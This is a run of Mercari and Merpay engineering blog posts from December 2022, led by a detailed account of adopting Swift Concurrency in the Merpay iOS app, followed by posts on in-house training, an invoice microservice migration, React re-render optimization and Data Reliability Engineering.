Main Xcode version we used was 13.4.1 but in late November we updated to Xcode 14.1.
Swift Concurrency is a developing feature, so a lot of bugs are fixed in Xcode 14 or later with Swift 5.7.
In this article, I am going to explain what we do with the Xcode version or Swift version.

Compiler options

Swift 5.5 or later provides incremental adoption for Swift Concurrency. Some compiler options are available: -warn-concurrency and -enable-actor-data-race-checks.

-warn-concurrency: with this option, the compiler checks code and emits Concurrency warnings that are invalid under the Swift 6 rules.
- It checks the adaptability of Sendable.
- This check is adopted throughout modules. Even if some modules don’t adopt Concurrency code and you can’t modify them, the compiler emits the warnings.
-enable-actor-data-race-checks: with this option, the compiler diagnoses data races that Swift 5 misses in runtime.
- If Swift 5 code calls a non-@Sendable closure multiple at the same time, this option tells you at runtime that an actor-isolated function was called on the wrong executor.

The way to set these options is here.
We need OTHER_SWIFT_FLAGS like that.

OTHER_SWIFT_FLAGS = -Xfrontend -warn-concurrency -Xfrontend -enable-actor-data-race-checks

For more information, see the forum post, Concurrency in Swift 5 and 6.

And Swift 5.7 has an update. About -warn-concurrency, Xcode 14 replaces this flag to SWIFT_STRICT_CONCURRENCY and we don’t need to use -warn-concurrency any more.
SWIFT_STRICT_CONCURRENCY can specify the strength of compile checks in more steps than warn flag
SWIFT_STRICT_CONCURRENCY has three modes.
This description is from Swift code.

minimal: Enforce Sendable constraints where it has been explicitly adopted and perform actor-isolation checking wherever code has adopted concurrency.
- It’s the default value with Xcode 14
targeted: Enforce Sendable constraints and perform actor-isolation checking wherever code has adopted concurrency, including code that has explicitly adopted Sendable.
- The scope of the check is limited.
complete: Enforce Sendable constraints and actor-isolation checking throughout the entire module.
- This effect is equivalent to -warn-concurrency

While we were using -warn-concurrency to support Swift Concurrency, we encountered many warnings that we could not fix. For example, -warn-concurrency emitted some warnings of Apple Frameworks, which we couldn’t update of course. Because -warn-concurrency checks throughout the entire module.
When we updated to Xcode 14.1, SWIFT_STRICT_CONCURRENCY became available.
We debated which level to specify and we chose one level below, targeted mode because complete mode, which is the same level as -warn-concurrency, is a very strong restriction.

SWIFT_STRICT_CONCURRENCY = targeted

Combine -warn-concurrency and SWIFT_STRICT_CONCURRENCY

When we combine -warn-concurrency flag and SWIFT_STRICT_CONCURRENCY with minimal, the compiler checks our code as complete level.
Thus, to proceed with the project with Xcode 14, we need to remove the -warn-concurrency option for each module.

Roadmap

Merpay code is divided into modules by features.
The modules are mainly divided into shared and feature modules.
Shared modules include core module and api module. These modules are very basic modules and each feature module depends on them.
The feature modules are divided by Merpay’s functionality and number more than 20.
For example, QR module provides QR payment feature, and Coupon module provides coupon service, or Settings module shows a settings screen.
And all of the feature modules refer to Core module and API module like that.

Thus, we had a plan on how we would proceed with our concurrency project.

Part1: We set -warn-concurrency option to each module and fix all of concurrency build errors.
- Some errors happen on MainActor issues.
Part2: We silence concurrency warnings as possible.
- We try to fix Sendable issues on this part.
Part3: We introduce async function into API module

We are currently in the middle of part 2.

Part1: -warn-concurrency errors and how to fix them

When we set -warn-concurrency option the compiler emits some concurrency errors.
I am going to share the errors and how to fix them.

Errors in initializer(Bugs up to Swift 5.6)

The first error we experienced was the errors of the initializer method in subclasses with UIViewController and UIView.
UIViewController and UIView are actually isolated MainActor already. You can see @MainActor annotated in the documentation.

note: MainActor is a special actor for main thread. See SE-0316

But up to Swift 5.6, Swift has a bug.
When we implement an initializer for a subclass of MainActor, the compiler emits the error like Property 'xxxxxxx' isolated to global actor 'MainActor' can not be mutated from this context

// built with Swift 5.6
final class SomeView: UIView {
    init() {
        super.init(frame: .zero)
        let view = UIView()
        view.backgroundColor = .blue
        // error: Property 'backgroundColor' isolated to global actor 'MainActor' can not be mutated from this context
        self.addSubview(view)
    }
}

To fix the bug, we need to annotate @MainActor to the initializer.

// built with Swift 5.6
final class SomeView: UIView {
    @MainActor // add the line
    init() {
        super.init(frame: .zero)
        let view = UIView()
        view.backgroundColor = .blue
        self.addSubview(view)
    }
}

Swift 5.7 fixes the problem. We can implement the initializer without annotating MainActor.

// built with Swift 5.7
final class SomeView: UIView {
    init() {
        super.init(frame: .zero)
        let view = UIView()
        view.backgroundColor = .blue
        // No more error!
        self.addSubview(view)
    }
}

for more information see the below.

A report for the bug
- https://github.com/apple/swift/issues/57973
A fixed PR for the bug
- https://github.com/apple/swift/pull/41662

The strategy of adapting MainActor

Most of the errors that occur with -warn-concurrency option are related to @MainActor.
If you call @MainActor method or property in a sync function’s body, the compiler emits errors.
For example, this code would not be built due to MainActor issues.

class SomeViewModel {
    func createView(completion: @escaping (UIView) -> Void) {

        let view = UIView() // error: Call to main actor-isolated initializer 'init()' in a synchronous nonisolated context

        view.translatesAutoresizingMaskIntoConstraints = false // error: Main actor-isolated property 'translatesAutoresizingMaskIntoConstraints' can not be mutated from a non-isolated context

        completion(view)
    }
}

We need to properly adapt @MainActor for sync functions.
There are three main ways to adopt it.
They all have their advantages and disadvantages, so we need to select them appropriately.

Task { @MainActor in }
await MainActor.run {} in Task {}’s body
Annotating @MainActor to your method or type

Task { @MainActor in }

The first way is Task { @MainActor in }.
You can use @MainActor in the Task initializer closure.

class SomeViewModel {
    func createView(completion: @escaping @Sendable (UIView) -> Void) {
        Task { @MainActor in
            let view = UIView()
            view.translatesAutoresizingMaskIntoConstraints = false
            completion(view)
        }
    }

    func configureView() {
        // no effect the caller of createView mothod
        createView { view in
        }
    }

Here are the Pros and Cons for Task { @MainActor in }.

Pros
- Changes will be partial. You don’t need to change the caller method.
  - The above code, you keep the caller method of createView(configureView) as it is.
Cons
- The timing of execution for the closure is the next run loop. The calling order would change. You should check whatever your code changes the original behavior.
- For example, before code, the calling order follows from top to bottom. But after code, the calling order jumps Task { @MainActor in } closure and then back to its closure block. The numbers in below code are in the order they are called.

// before
func createView(completion: @escaping @Sendable (UIView) -> Void) {
    // 1
    let view = UIView() // 2 
    view.translatesAutoresizingMaskIntoConstraints = false // 3 
    completion(view) // 4 
    // 5
}

// after
func createView(completion: @escaping @Sendable (UIView) -> Void) {
    // 1
    Task { @MainActor in
        let view = UIView() // 3 
        view.translatesAutoresizingMaskIntoConstraints = false // 4 
        completion(view) // 5
    }
    // 2 
}

This causes some bugs for Merpay code. Merpay code has a lot of Snapshot testing.
Changing calling order with Task { @MainActor in } affected Snapshot testing and we couldn’t get the right screen in the test.
You should use Task { @MainActor in } carefully.
It might change your original behavior.

await MainActor.run {} in Task {}’s body

The second way is await MainActor.run {} in Task {}’s body.
You can use await MainActor.run {} in the Task initializer closure.
Compared to Task { @MainActor in }, it is a good way for me.

Pros
- Changes will be partial. You don’t need to change the caller method.
- Unlike Task { @MainActor in }, the calling order in Task’s closure is executed from the top. You can call some Task not calling in Main Thread, and then you call some task in Main Thread in sequence.
Cons
- Nothing so far compared to Task { @MainActor in }

func calculateWidth() -> CGFloat {
    .zero
}
func createView(completion: @escaping @Sendable (UIView) -> Void) {
// The numbers are in the order they are called.
    Task {
        let size = calculateWidth() // 1
        await MainActor.run {
            let view = UIView() // 2
            view.translatesAutoresizingMaskIntoConstraints = false // 3
            view.frame.size.width = size // 4
            completion(view)  // 5
        }
    }
}

In Merpay Code, we use it when we need to take care of calling orders.

Annotating @MainActor to your method or type

It is the final way of adopting @MainActor.
You can just annotate @MainActor in your method or types.

@MainActor // <- add
func createView(completion: @escaping (UIView) -> Void) {
    let view = UIView()
    view.translatesAutoresizingMaskIntoConstraints = false
    completion(view)
}

@MainActor // <- also add
func configureView() {
    createView { view in
        // do something
    }
}

Pros
- It is a simple way to fix the MainActor issue.
- It is easy to understand which methods or types are called by MainActor.
Cons
- Your fix propagates the caller. In the above code, you need to annotate the configureView method as well. You should annotate your method up to the place where the caller is MainActor in.

Merpay iOS team decided we annotated @MainActor to all of ViewModels.
Although the amount of code to be changed is very large, we decided that it would be easier to understand than making partial modifications.

Annotating @MainActor to all of ViewModels

Merpay iOS code uses the MVVM architecture. ViewModel detects UIViewController events and calls API and then sends the data to ViewController.
Now we decided we annotated @MainActor to all of ViewModel.
At this time, you may have a question.
“Is it okay? you call some API request in Main Thread?”
Basically, there is no problem.
Our team checked the MainActor’s behavior.
A method isolated by MainActor is called in the main thread.
but the callback of the DispatchQueue.global is called in a non-main thread.

@MainActor
func foo() {
    // call in main thread
    DispatchQueue.global(qos: .background).async {
        // call in not main thread
    }
}

The API call was not called from the main thread even if the API call was made by the actual API client from the ViewModel with MainActor annotated.
So we could safely annotate @MainActor to ViewModels.

Errors with Default Values

Some default values for your method don’t work when the values are isolated by MainActor.
For example, we have a method with default value to set the key window.

// built with Swift 5.7
@MainActor
public final class SomeClass {
    public let keyWindow: UIView
    public init(keyWindow: UIView = UIApplication.shared.windows.first { $0.isKeyWindow }!) {
    // error: Class property 'shared' isolated to global actor 'MainActor' can not be referenced from this synchronous context
   // error: Property 'isKeyWindow' isolated to global actor 'MainActor' can not be referenced from a non-isolated synchronous context
   // error: Property 'windows' isolated to global actor 'MainActor' can not be referenced from this synchronous context

        self.keyWindow = keyWindow
    }
}

note: UIApplication.shared.windows is deprecated by iOS 16. if you use keywindow in iOS 16, use UIApplication.shared.connectedScenes

This behavior is reported to Swift repository as well.

Wrong error: Class property ‘X’ isolated to global actor ‘MainActor’ can not be referenced from a non-isolated synchronous context #59484

In this issue, using static property is suggested.
But we didn’t use static property.
To fix the error, we can add a static property, but if the class we want to fix is public, the static property needs to be public as well.

// built with Swift 5.7
@MainActor
public final class SomeClass {
    public let keyWindow: UIView

    // it works but can we allow defaultWindow to be public? 
    @MainActor
    public static let defaultWindow = UIApplication.shared.windows.first { $0.isKeyWindow }!

    public init(keyWindow: UIView = defaultWindow) {
        self.keyWindow = keyWindow
    }
}

And we can’t set a private static property to a public method with default value.

// built with Swift 5.7
@MainActor
public final class SomeClass {
    public let keyWindow: UIView

    @MainActor
    private static let defaultWindow = UIApplication.shared.windows.first { $0.isKeyWindow }!
    // it becomes private  

    public init(keyWindow: UIView = defaultWindow) {
    // error: Static property 'defaultWindow' is private and cannot be referenced from a default argument value

        self.keyWindow = keyWindow
    }
}

We can’t allow adding unnecessary property to be public.
Thus, we use another solution, optional value.
We define an optional value to method’s argument, and when the value is nil, we set the default value.

// built with Swift 5.7
@MainActor
public final class SomeClass {
    public let keyWindow: UIView
    public init(overrideKeyWindow: UIView?) {
        if let overrideKeyWindow = overrideKeyWindow {
            self.keyWindow = overrideKeyWindow
        } else {
            self.keyWindow = UIApplication.shared.windows.first { $0.isKeyWindow }!
        }
    }
}

With optional value, we kept the original behavior and avoided concurrency errors.

Part 2: -warn-concurrency warnings and how to silence them

In Part 2 task, we try to silence concurrency warnings with -warn-concurrency.

MainActor and Protocols

When a type that is isolated by MainActor adopts a synchronous function with a protocol, concurrency warnings happen. A synchronous function means a function/method without async keyword.

For example, here is InputAppliable protocol and SubView class.

public protocol InputAppliable {
    associatedtype Input
    func apply(input: Input)
}

public final class SubView: UIView, InputAppliable {
    public struct Input {
        var name: String
    }

    public func apply(input: Input) { // warnings: Main actor-isolated instance method 'apply(input:)' cannot be used to satisfy nonisolated protocol requirement
        // do something
    }
}

SubView inherits UIView, so apply(input:) method is isolated by MainActor.
It means the apply method is seen as an async function from another type.

public final class SubView: UIView, InputAppliable {
    public struct Input {
        var name: String
    }

    public func apply(input: Input) async { // another types recognizes the method as async function
    }

but InputAppliable requires apply(input:) method, not apply(input:) async method.
so SubView doesn’t satisfy the corresponding requirement from InputAppliable.
This is the reason for the warnings.

To silence the warnings, we have two solutions.
First, we can add a nonisolated keyword to apply(input: ) method in SubView.

public final class SubView: UIView, InputAppliable {
    nonisolated
    public func apply(input: Input) { 
        // do something
    }

But this solution doesn’t work when we need to call the MainActor method in the body.
Second solution, we update the protocol itself with MainActor.

public protocol InputAppliable {
    associatedtype Input
    @MainActor // add
    func apply(input: Input)
}

Step up rollout

We have some fundamental protocols including InputAppliable that are referred to by all of the modules in Core module.
If we update these protocol directory, a lot of errors occur in a module that we don’t start concurrency tasks in.
For example, if an existing ViewModel without MainActor adopts InputAppliable and InputAppliable annotates MainActor, the existing ViewModel will not be builded.

public protocol InputAppliable {
    associatedtype Input
    @MainActor // add
    func apply(input: Input)
}

// some ViewModel without MainActor
public final class SomeViewModel: InputAppliable {
    public struct Input {
        var name: String
    }
    init() {}
    public func apply(input: Input) {

    }

    func requestAPI(completion: @escaping () -> Void) {
        completion()

    }

    func viewDidLoad() {
        requestAPI { [weak self] in
            self?.apply(input: .init(name: "")) // error: Call to main actor-isolated instance method 'apply(input:)' in a synchronous nonisolated context
        }
    }
}

So we created an async version of the protocols and deprecated the existing one.
This code is an example for InputAppliable protocol.

@available(*, deprecated, message: "Please use AsyncInputAppliable instead, which conforms to concurrency", renamed: "AsyncInputAppliable")
public protocol InputAppliable {
    associatedtype Input
    func apply(input: Input)
}

public protocol AsyncInputAppliable {
    associatedtype Input
    @MainActor
    func apply(input: Input)
}

We created AsyncInputAppliable with MainActor.
We use it in MainActor types.
And the existing code still refers to the old one, InputAppliable.
So we can build our code properly while some modules are updating to Concurrency.

Apple frameworks don’t support Concurrency feature yet

The -warn-concurrency is checked through all module.
But some Apple frameworks don’t support Concurrency feature yet, so we have warnings that we can’t fix.
We have a ViewController adopting AVCapturePhotoCaptureDelegate protocol.
But AVCapturePhotoCaptureDelegate doesn’t have async method yet, so we have a warning like that.

extension CameraViewController: AVCapturePhotoCaptureDelegate {
    func photoOutput(_ output: AVCapturePhotoOutput, didFinishProcessingPhoto photo: AVCapturePhoto, error: Error?) {
// warning: Instance method 'photoOutput(_:didFinishProcessingPhoto:error:)' isolated to global actor 'MainActor' can not satisfy corresponding requirement from protocol 'AVCapturePhotoCaptureDelegate'
    }
}

Of course, we can’t update AVCapturePhotoCaptureDelegate code directory since it belongs to Apple code.
We have to wait for them to update. Until they do, we leave our code as it is.
If you set SWIFT_STRICT_CONCURRENCY option to targeted, this warning will disappear.

Using @preconcurrency with non-supported Concurrency module

If you need to import a module that doesn’t support Concurrency yet, you can use @preconcurrency.
In Merpay code, to define API structure we use Protocol Buffers via swift-protobuf.
Unfortunately, the version we use of swift-protobuf is a little old and doesn’t support Sendable.
When we use a type that doesn’t support Sendable in a type adopting Error protocol, a warning occurs.

import PlatformProto
public enum ResponseError: Error {
   ...
   case apiError(Mercari_Gateway_V1_Error) // warnings: Associated value 'apiError' of 'Sendable'-conforming enum 'ResponseError' has non-sendable type 'Mercari_Gateway_V1_Error'
}

PlatformProto is an in-house library that depends on swift-protobuf.
The compiler emits a warning because Mercari_Gateway_V1_Error doesn’t support Sendable yet.

To silence the warning, we can add @preconcurrency to the import line.

@preconcurrency import PlatformProto

Modules imported with preconcurrency will not be checked for Sendable.
And when the module supports Sendable, the compiler emits a warning that @preconcurrency is not necessary.
In the proposal SE-0337 says like that.

If the @preconcurrency attribute is unused[3], a warning will be emitted recommending that it be removed.

So we can use @preconcurrency with confidence.

Conclusion

I showed you how we introduce Swift Concurrency in the Merpay codebase.
We set the compile option -warn-concurrency and fix the concurrency errors and silence warnings.
-warn-concurrency is a very strict option. The compiler will emit a lot of warnings you can’t silence.
If you use Xcode 14, we recommend you to use the SWIFT_STRICT_CONCURRENCY option as the targeted level.
As some Apple frameworks don’t support Swift Concurrency, it is hard to silence all of concurrency warnings.
As I showed you today, in some cases, annotating @MainActor causes a domino effect, and we might need to change the logic significantly.
Concurrency support may have been premature due to errors up to Swift 5.6. However, through concurrency adoption, we learned how to write code to prevent data races.
I hope this article helps you.

Reference

Implement -strict-concurrency control and default to "minimal" #42523
- The PR for Swift 5.7 of SWIFT_STRICT_CONCURRENCY
Eliminate data races using Swift Concurrency: WWDC 2022
- WWDC 2022 video
Incremental migration to concurrency checking
- the proposal for SWIFT_STRICT_CONCURRENCY
@MainActor Doesn’t work or misunderstood?
- The behavior of MainActor

Showcasing “DevDojo,” a Series of Mercari-Developed Learning Content for Engineering

Fri, 23 Dec 2022 10:52:04 GMT

Hello, everyone! My name is @aisaka from the Engineering Office. This post is for day 23 of Mercari Advent Calendar 2022.

In the Mercari Engineering Division, we aim to be an organization where we can all learn from each other, where we can be self-starters, and where we can continuously grow both professionally and personally.

One of the mechanisms that help embody this “learning culture” at Mercari is the “DevDojo” series of in-house technical training programs. We have decided to make some of the DevDojo series externally available to the public for the first time, so in today’s blog, I will introduce DevDojo and its content.

DevDojo page in Engineering Website

What is DevDojo?

“DevDojo” was named by combining the words "Development" and "Dojo," which means “a place for immersive learning” in Japanese.

The DevDojo series consists of around fourty sessions at Mercari and Merpay, all of which are planned and created by Mercari engineers.
*Merpay is a mobile payment service that can be used through the marketplace app Mercari.

Initially, DevDojo was created for new graduate training, but there was so much interest in the content that many people already in the company asked to participate as well. We decided to open the course to anyone who wants to take it within Mercari Group.

Here is an article about our new graduate recruiting (only available in Japanese): メルカリの新卒エンジニアは入社後どう過ごす？2022年4月新卒が経験した技術研修のすべて

The DevDojo series consists of a diverse range of content full of insights and ideas from Mercari’s engineers.

Now, we’ve decided to make some content externally available to contribute to the global engineering community and provide learning opportunities to everyone outside of the company.

What’s Available From Today!

In Mercari’s engineering organization, more than half of the employees come from outside Japan. We coordinate the DevDojo lectures so that half of them are given by English-speaking instructors and the other half by Japanese-speaking instructors.

Of course, we have language support from our translation and interpretation team (GOT) to provide simultaneous interpretation for both languages. All presentations are prepared with English slides, and Japanese slides are optional.

Of the six presentations released at this time, five lectures are in English (with simultaneous interpretation into Japanese) and one is in Japanese (with simultaneous interpretation into English).

Next, I’ll introduce these six lectures in more detail!

Experiments and Feature Flags

We will go over the essentials for understanding experimentation at Mercari, and how to instrument and configure basic experiments and feature flags. We will also briefly review how this affects our development practices. You can learn about ideas and designs for implementing and executing experiments.

Microservices Development 101

This session gives a basic overview of how Microservices and various tools combined with GitOps are used inside Mercari, which powers the developer platform.

Incident Handling

This session explains incident management in Mercari and its best practices of it. We share a complete incident journey, including three phases "before, during, and after the incident." We also cover how we conduct incident reviews and improve retrospective qualities throughout the company.

Design Doc

This explains the basic concept of Design Doc for product development and introduces the template that Mercari actually uses now. We will also cover how to write a good design doc and deal with it in Mercari.

Mercari QA

In Mercari’s fast-paced development cycle, QA (Quality Assurance) is critical to the success of the application. In this course, you will learn about Mercari’s QA team and what processes, tools, and techniques are used to quickly identify and solve issues.

Product Development and Tools

This explains product development processes in Mercari and how to handle them in JIRA. We will also cover the Agile development process that Mercari has been utilizing for the past three years.

Future improvements

This is just a small sampling of what DevDojo has to offer. We are planning on opening up more content to the public in the near future, so keep an eye out for the next round!

Closing thoughts

Last but certainly not least, the continued support of the engineers and EMs (Engineering Managers) on the front lines is an absolute must to open internal content like this to the public.

I’d like to give a big thanks to all the Mercari members who collaborated across teams and contributed to creating, reviewing, and presenting the content.

We hope our content helps you learn something new.

Mercari Group is actively hiring engineers right now! If you are at all interested, please do not hesitate to reach out!

Open position – Engineering at Mercari

Day 24 of the 2022 Mercari Advent Calendar will be written by @prashant, who is an ML engineer. Be sure to check it out!

The Journey of Invoice Microservice: From Birth to Independence

Tue, 20 Dec 2022 12:00:21 GMT

This post is for Day 20 of Merpay Advent Calendar 2022, brought to you by pedro from the Merpay Credit Design Backend team.

In the Merpay system, invoice microservice manages customers’ invoices of deferred payment service so called Merpay Smart Payments(メルペイのあと払い) and small-sum loan service so called Merpay Smart Money(メルペイスマートマネー). It also provides various methods to repay those invoices.

But in the very beginning of the Merpay system, there was no invoice microservice. This post describes why we decided to create the invoice microservice and how we are growing it from just a concept to an independent running microservice.

The System Without Invoice Microservice

Before Merpay released the Merpay Smart Money, there was only one service issuing invoices to customers, which was Merpay Smart Payments. It was not necessary to have a dedicated invoice microservice to manage the invoices.

Smartpay microservice supported the entire process of using Merpay Smart Payments, from deferred payment, issuing monthly invoices to repayment of those invoices.

As shown in the diagram, the following invoicing related functionalities were all provided by smartpay microservice.

calculate the service fee based on the usage, and issue monthly invoices.
repay the invoices at the convenience store or using Merpay balance.
automatically charge from the bank account to repay the invoices.
schedule the day for the automatic charging.

Because smartpay microservice contains all Merpay Smart Payments related data, providing these functionalities in the same microservice is much simpler than having a separate invoice microservice.

Invoice Microservice Inside Smartpay

In 2021, Merpay decided to launch a small-sum loan service called Merpay Smart Money. While analyzing the requirements of smart money, we found out there were so many common functions with Merpay Smart Payments, especially for those related with invoicing.

There were several system design plans discussed at that time, with pros and cons for each. Finally we decided to have a dedicated invoice microservice to manage invoices of both Merpay Smart Payments and Merpay Smart Money, because it would bring us several benefits.

the common functions can be reused as much as possible.
charge only once from the bank account and repay both invoices if the customer schedules the same repayment date.
easy to manage repayment priority of different invoices, especially when there is limited repayment source.

Ideally, we have to create two new microservices, one for the Merpay Smart Money domain and the other for the invoice domain. Also a big change is needed in smartpay microservice, to split the invoice related functions to invoice microservice.

While considering the limited development resources and the release schedule, we have to give up the plan of creating the ideal system in the very beginning of the Merpay Smart Money launch, instead we decided to implement the system step by step.

As for the first step, only minimum development was needed for the Merpay Smart Money launch, including the new smart money microservice and extending smartpay microservice to provide invoice functionalities by a new gRPC server. Implementing a new invoice gRPC server instead of mixing the functionalities within the existing ones for Merpay Smart Payments, it also left us the opportunity to migrate invoice microservice outside of smartpay in the future.

Although in this step we just created a gRPC server inside the existing microservice, and the invoice microservice was more like a concept, it is still important to clarify the responsibilities of each microservice at that point. Invoice microservice supports both invoices of Merpay Smart Payments and Merpay Smart Money, it should only deal with abstracted invoice models. As the clients, smart money and smartpay microservices should handle each domain’s specialized logic and data, for example: calculating service fee or interest to be invoiced each month.

To achieve this, remodeling some invoice related tables inside the smartpay microservice was necessary. Take the invoices table as an example, we needed to distinguish between the fields only for the Merpay Smart Payments domain and those for an abstract invoice, and add new fields if necessary.

The Migration Project

Although we were able to launch the Merpay Smart Money with minimum development, it was not the final goal as there were still several technical debts to be repaid.

Problems

The problems can be mainly categorized into two types, one with the codebase and the other with the database.

Although gRPC servers as the interface are separated, the source code for invoice domain and for Merpay Smart Payments domain are still in the same smartpay codebase. Apparently this brings us the following issues.

increased complexity of codebase.
risk of unintentional effect on invoice microservice with Merpay Smart Payments function update.
risk of unintentional effect on Merpay Smart Payments with invoice function update.

As for the database, entities of some tables represent both the Merpay Smart Payments domain and the abstract invoice domain. This increases the difficulty to understand the data model as well as the complexity and maintainability of data analysis queries.

Migration Plan

When talking about the migration of invoice microservice from smartpay to an independent microservice, three systems are involved.

At first, an independent invoice microservice needs to be created to provide the same invoice gRPC server and run the same invoice related batches.
Current client of invoice microservice, the smart money microservice needs to switch the request destination from invoice inside smartpay to the new invoice microservice.
The smartpay microservice needs to use invoice microservice to achieve invoice related functionalities.

We want to avoid introducing all these changes to all the systems at the same time, so we use the current invoice gRPC server inside smartpay as a proxy, and process the migration on each customer’s basis. Based on the customer’s migration status, the invoice gRPC server inside smartpay decides to proxy the request to the new invoice microservice or process it within smartpay microservice. Thus we can control the migration progress easily, and nothing needs to be changed on the client side before finishing all customers’ migration.

After finishing the migration for all the customers, the client side could switch the destination from invoice microservice inside smartpay to the new invoice microservice. And the invoice microservice inside smartpay could also be deprecated.

The migration project is still ongoing, and there are several interesting topics in the migration process, for example: how to keep the consistency of data, TDD practice, etc. Hopefully we can share more with you in the future.

In The End

It‘s never an easy thing to design and implement a perfect system architecture. The perfect architecture today may not suit tomorrow’s requirements. Rather than always aiming to build a perfect architecture, making the decisions based on current situation, recognizing the technical debts in those decisions and repaying those debts timely with a plan might be a more practicable way to run a microservices system.

Tomorrow’s article will be by @fivestar. Look forward to it!

Optimizing React Re-Renders for Improved Performance

Tue, 20 Dec 2022 10:54:05 GMT

Hello, this is Sahil Khokhar, and I work as a Frontend Architect at Mercari. This post is for Day 20 of Mercari Advent Calendar 2022.

You’ve probably heard of React, right? It’s that popular JavaScript framework that a lot of people use to build web apps. Well, we use it too! At Mercari, we use React for most of our products because it’s declarative, flexible, and performs really well. These characteristics make it easy to understand and maintain code, as well as streamline the development process with reusable components.

Okay, let’s break down some technical details…

If you’re familiar with React, you probably know that it uses a virtual Document Object Model (or "DOM") to optimize updates to the actual DOM. This process of updating the DOM is also called DOM manipulation, and it’s at the heart of web development. The problem is that DOM manipulation can be really inefficient and slow. That’s where React comes in – it uses something called the Virtual DOM to make DOM manipulation more efficient and improve performance. When you update a React component’s state, the Virtual DOM compares the new version to the old version (kind of like taking two snapshots and finding the difference) and only makes the necessary changes to the actual DOM. This helps improve the overall performance of the application.

Now that we know a little bit about what’s going on under the hood in React, on the surface its top priority is to make sure the user interface stays "in sync" with the application state. To do this, React triggers re-renders for components as needed. It’ll do whatever it takes to make sure the UI stays up to date. In this blog post, I want to clear up some misconceptions about re-rendering and show you one of the simple ways to optimize the rendering performance of your react applications.

Understanding React Re-Renders

If you’ve struggled with understanding why a particular component re-renders multiple times or why renders are super slow, you are not alone! In fact, we have all spoken with numerous React developers who have struggled to fully grasp the underlying logic of re-rendering in their applications.

In an effort to clarify this concept, let us attempt to simplify it here…

Re-renders in react are triggered with a state change.

It’s the only way how re-renders are started. Let’s take a look at this with an example:

The above example demonstrates the use of a single tree with a component called App. This component displays a button labeled "Increment" and shows the current count value below it. When the user clicks the "Increment" button, the count is incremented by 1.

In React, each component instance has a corresponding state. In the above example, the App component has a single piece of state called count. When the count state changes (such as when the user clicks the "Increment" button), the App component will re-render to display the updated count. This process is a fundamental aspect of React’s functionality and is pretty straightforward.

In the event that our component hierarchy is more complex, this can introduce additional complexity.

In React, when a component re-renders, all of its descendant components are also re-rendered.

To illustrate this concept, let’s consider the following example:

In the above example, there are three components: App, Counter, and CountNumber. App is the top-level component and renders Counter, which in turn renders CountNumber. In terms of hierarchy, CountNumber is the immediate descendant of Counter, which is the immediate descendant of App.

The Counter component has a state called count associated with it. When the value of count changes, the Counter component will re-render and, since CountNumber is a descendant of Counter, it will also re-render.

It is a common misconception that a change in state within a descendant component will trigger a re-render of the parent component in React.

However, this is not the case.

React follows a one-way data flow, meaning that data can only flow downward through the component hierarchy and cannot flow upwards. Therefore, a change in state within a descendant component will not trigger a re-render of the parent component.

So, when the count state changes in the above example, the App component is not re-rendered.

The process of updating the virtual DOM to match the desired state of the UI in React is known as Reconciliation. This process occurs after a state change and involves calculating the difference, or "diff", between the virtual DOM and the desired state. The virtual DOM is then updated with the minimum number of operations necessary to bring it in line with the desired state. This helps to ensure that the React UI stays in-sync with state changes and helps to optimize the performance of the application by minimizing the number of DOM manipulations (remember we talked about React’s #1 priority in the beginning of the article).

Optimizing Rendering Performance

It is important to carefully consider the data flow through the component hierarchy and the proper association of state with component instances in React to avoid potential pitfalls. Incorrectly managing data flow and state association can lead to unintended re-renders and potentially negatively impact the performance of the application.

Now, let’s explore some examples of potential pitfalls in React rendering and how we can optimize rendering speed:

The above example consists of three components: App, Counter, and ExpensiveComponent. The App component is the top-level component and renders the Counter component, which in turn renders the ExpensiveComponent.

Imagine that the ExpensiveComponent performs an expensive logical operation. This means that whenever the Counter component is rendered or re-rendered, due to its association with the count state, ExpensiveComponent will also be re-rendered, even though it has no relation to the count state.

It may be tempting to use React.memo to memoize the ExpensiveComponent and prevent it from re-rendering. While this can be a viable solution in some cases, it may not always be the most effective approach. Memoizing every component can be counter-productive if the component has a large number of props and few descendants, as the process of checking the props for changes may be slower than simply re-rendering the component. In such cases, making the ExpensiveComponent pure with React.memo may cause it to unnecessarily check its props on every render, leading to decreased performance.

So is there a way to optimize the performance of this code?

Yes, one option is to optimize the component hierarchy by moving the state down and properly abstracting it. If we closely examine the above example, we can see that only a specific portion of the Counter component depends on the count state. By extracting this code into a separate component and moving the count state down into it, we can potentially improve performance.

Now, whenever re-renders are triggered for the DisplayButtonAndCount component, ExpensiveComponent is not re-rendered. Problem solved.

With the above smart code abstraction, it not only makes our code more readable but also improves the performance of our application (cherry on top for doing effective abstraction in your codebase).

What’s the moral?

The simple trick and concepts covered above have had a significant impact on the industry, such as reported by Brooks Lybrand:

The concept of effectively managing state and maintaining a proper component hierarchy is a fundamental aspect of writing high-quality code in React.

It is important to place state variables where they are used and to avoid premature optimization. As a general rule, it is advisable to write the code first, measure its performance, and only optimize if necessary. Simple techniques, such as above, that address these issues are often undervalued and deserve more attention. Rigid adherence to certain paradigms can result in micro-optimizations that may have only a minor impact on performance but significantly decrease code readability and organization.

Thank you for reading!

This article is motivated from blog-posts by Kent and Dan. Be sure to check those out too for more interesting insights.

Tomorrow’s article will be about the Kubernetes Scheduler by @sanposhiho. Look forward to it!

What is Data Reliability Engineering

Mon, 19 Dec 2022 11:00:21 GMT

This post is for Day 19 of Mercari Advent Calendar 2022, brought to you by Daniel Lameyer from the Mercari US Data Reliability Engineering team.

Introductions

Mercari US Data Engineering is responsible for many essential pipelines that provide the data for many teams and products such as machine learning, business intelligence, accounting, and marketing.

Every year, the data footprint at Mercari US expands in the cloud, and Data Engineers will need to apply the principles of DevOps and SRE to scale with it and enable developers to still be able to take on data projects with our partners.

In order to successfully do so, the Data Reliability Engineering team is here to monitor, automate and manage pipelines to enable our partner USDE teams to have the ease of mind to tackle projects to help Mercari move forward.

What is Data Reliability Engineering?

Data Reliability engineering evolved as a specialization in Data Engineering by applying the principles of DevOps and Site Reliability Engineering to manage data infrastructure.

Like software, data can break in countless different ways; from data quality issues, missing records, duplication, missed updates, access issues, and many more. Although we cannot avoid all incidents, we can significantly reduce the likelihood and reduce the average time to resolution when they do occur.

Data Reliability Engineers (DREs) establish intelligent monitoring and data testing to improve the observability of the essential data processes. They build processes like CI/CD and automate away manual procedures that can cause issues to the system from human error. DREs will also establish systems to recover and secure data for whenever disaster strikes.

DRE in Mercari US Data Engineering

In July of this year, US Data Engineering (USDE) expanded into four focused teams; Data Warehouse, Third Party Data Integration, Content Acquisition & Knowledge , and Data Reliability Engineering.

